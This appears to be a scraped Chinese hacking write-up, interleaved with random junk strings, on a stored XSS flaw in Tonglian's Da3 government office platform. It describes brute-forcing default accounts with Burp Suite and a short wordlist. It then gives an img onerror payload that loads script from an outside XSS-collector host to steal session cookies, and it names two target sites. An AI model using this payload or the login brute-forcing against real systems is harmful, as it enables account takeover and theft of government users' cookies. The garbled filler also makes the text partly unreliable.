$ w, r, M2 g+ ]( A! E M/ {
4 |# t% h$ P. A1 r
同联Da3协同办公平台后台通用储存型xss漏洞
) U, i3 \3 K4 \* @ Y7 c% N
+ v, h5 r' A. x5 q* m
2 Q5 k0 z; L4 I3 e7 H9 N" F 平台简介:/ c8 P3 W$ x% \+ O* W' v
9 S! R9 |6 U' [8 t" H5 O' g 0 S! t1 z4 g) D" F, v
1 d9 |2 u8 v% ]- i- X) e# w$ U7 _' t
* v; Z$ A$ x* F' `% M - f' w! u& J+ X7 p6 S
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% J( d. P3 q4 f% \5 j
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 ~4 Q+ F! Z# A/ ~% u2 C1 c同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, ~+ [8 r" m/ Z# E
, ]2 |5 A5 z5 m2 g. T7 d
+ |' o- i9 N k$ Z% |2 D
! k, |6 i- h1 Z% B5 p! o# Z
7 L6 G( ], N" H" h% q2 C2 v" Y3 [! j : }8 ?* ]+ ~( J( Z7 a
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:# [+ m) s: @$ j- K0 q4 W+ \; G$ Q
" L$ d2 X/ N4 F1 O) \: F: z ; _' U/ R2 k3 d5 g8 Y, t, M# k
9 R/ m$ G5 R: B6 v3 B, m/ o J
& I' b* d7 Y, m* N. H6 h$ p
; g7 d6 e/ [) v5 E. n/ } http://1.1.1.1:7197/cap-aco/#(案例2-)7 R. H u( o; L; g/ v7 v
3 m9 \ f$ \6 h. }$ k( C- K
9 D/ t4 A7 y: T; X/ v1 b4 T http://www.XXOO.com (案例1-官网网站)
5 W {" m3 z g- b: g
: W. j5 F) f7 L. x: j
( V y# l) @. j: U; z
漏洞详情:
9 M4 ~; U9 V0 F+ l
?# b" j( h$ w & r' O, O5 J: C! R5 P- Y: u5 E
案例一、
A& B" `! ^# i
: b: L! ~# I0 s
3 q1 V7 {6 G* V( H6 l2 a# Q; D p9 W 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试$ O. G. m/ O( \5 X* x% S
. ]( a& y2 c! F4 \# B ) F2 i8 K3 t# K
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:% Q5 P5 K- F) u' \+ T4 X H" Z
$ C8 E L( h: V/ m8 w& e- W/ v
' h- H. f! t' C# U
" i1 K4 u2 |: m D: t
d' ^/ |, {9 \! j. Y1 |2 g
8 [" @7 D8 Y6 ~/ e7 y) l
5 Q5 k( A' { I7 c8 {- n7 `& u; s
( w/ Y' r0 \, k; o
, ?* v6 p7 L) }* y& a D) o3 s( R3 l status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ! q1 Q0 K+ E. S. M# s4 y
N4 Q$ F: ^; g( c 1 N }' ? b# `8 G( a
* t& t/ n( q+ N6 w
1 ], R1 k8 o1 B) g' q8 M - `. e$ A! u$ d7 Q
4 G7 q) F/ ~9 n: C& M- m- o: R6 r6 p
, N$ n# _$ X5 f- q* s1 I/ K $ t4 M1 T0 t" C
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 0 a- c4 X9 ]9 D5 ~% z( K5 P
/ v& \6 l* f% w
% f: u1 i" k; o7 q* b- r 4 J$ x' |, a' f% S3 F+ ~! |
7 Q; c* h) T, D; q+ m : X2 l/ w) \' @/ F7 i
<img src=x
% m+ j( L$ c7 ?* Honerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: , V( S8 q: d: P ?: F# b+ J
5 w" H/ Z/ i& V9 X # f; @! f: I$ ~% @* v0 t
4 k5 u/ B& D" L
?' D" ^5 A1 P- t 5 @6 E, {- N' F8 G1 x
然后发送,接收cookie如图: : \0 ~$ i% L( F( U" |8 Q4 Z& [7 `
( c0 N/ W" f( l4 ^6 L
/ T+ S& Q: d3 F1 b
6 A, t- Z8 w! O' f" S2 s
5 A- `; s, r% s+ }, C: u+ y9 o& P) h8 R
' A. t$ U. v$ S, p1 q) Z. s
- ~& p7 u8 E- G4 K
5 J0 Z* z _' [- z 7 i7 M8 t: u2 O
: g, K* ]* Y' b. C& v! z9 ~
4 ]& V! A$ j; k( T7 ~
2 c) X8 {/ D2 H1 l% ]0 N- W8 C
s/ K' d4 O8 a" P2 n
9 _( G8 Q" j1 P $ |1 Y4 ~0 b! s# n C* R
9 \9 w" S, r* j% Y5 P
0 G6 l U7 Z( q$ D. A
2 N. b1 a/ e% U% ~$ B/ f) P9 d1 F
8 o9 |: P# }9 F& R: r1 \8 N5 A# }
% I( L9 ]! Y- K
" ~: W9 C, W) o' }/ P# G( a % {2 C4 T! L1 Z- h* X4 T8 p8 M
* B# B% O$ l! z) A6 @+ |
+ ~# }8 c1 n# W( C
案例2、
1 Z4 z1 d2 W4 j5 O& m- d8 {/ @% e
3 F! R6 o# c. P
7 M/ _. N0 @6 W2 N s7 p, r7 W- M' N
前面步骤都一样,下面看效果图:
* h: P/ B* f' [/ C F7 v
$ g; l" B* I* m* S
) e# E, Q$ h/ ~/ v7 `+ M
& d' Y4 E& z' E& }% \- `2 G% p
5 c/ {( l! w/ ^3 E , X2 \5 z( n- m9 W4 l0 s
& }8 _9 u* M) H& e
4 U: e- F+ k: c" C4 F' u. ^
* r1 ^/ p5 X5 ?$ M 2 K; x8 ?' L* N' ~3 N- p! t5 d2 y0 W
* r8 z- ~2 W! X- H
2 l( J# W( u, { X, z. K* Q1 p( J
. @: z% N9 n" X! a) z
t2 w2 Y5 P& Y( i! L Y
: h: @8 t @1 x$ b0 o7 i0 k8 a
' ^( d9 _3 E4 V+ ~* a: B/ I
% }% K0 p$ K# _9 A( k
! J6 z2 D; {. g) z
8 W) a6 y( w! r$ _
6 Z7 c: K$ \2 H) C: U9 c! G
$ ~, d* u0 W* z" X
; D e0 B. G2 V! z: T
# f1 y$ B1 ?* I; I8 D9 o; v% s
K8 Y3 l T" o/ k- E
2 l. U8 ~" _& ^0 ?' H" K
$ [ g4 h. N% a& `" a! M
5 q9 r4 l! x' E. g ; r% {3 n6 i4 j: n& s- w0 A$ P
; _8 v# I$ e T) w$ S6 ^% a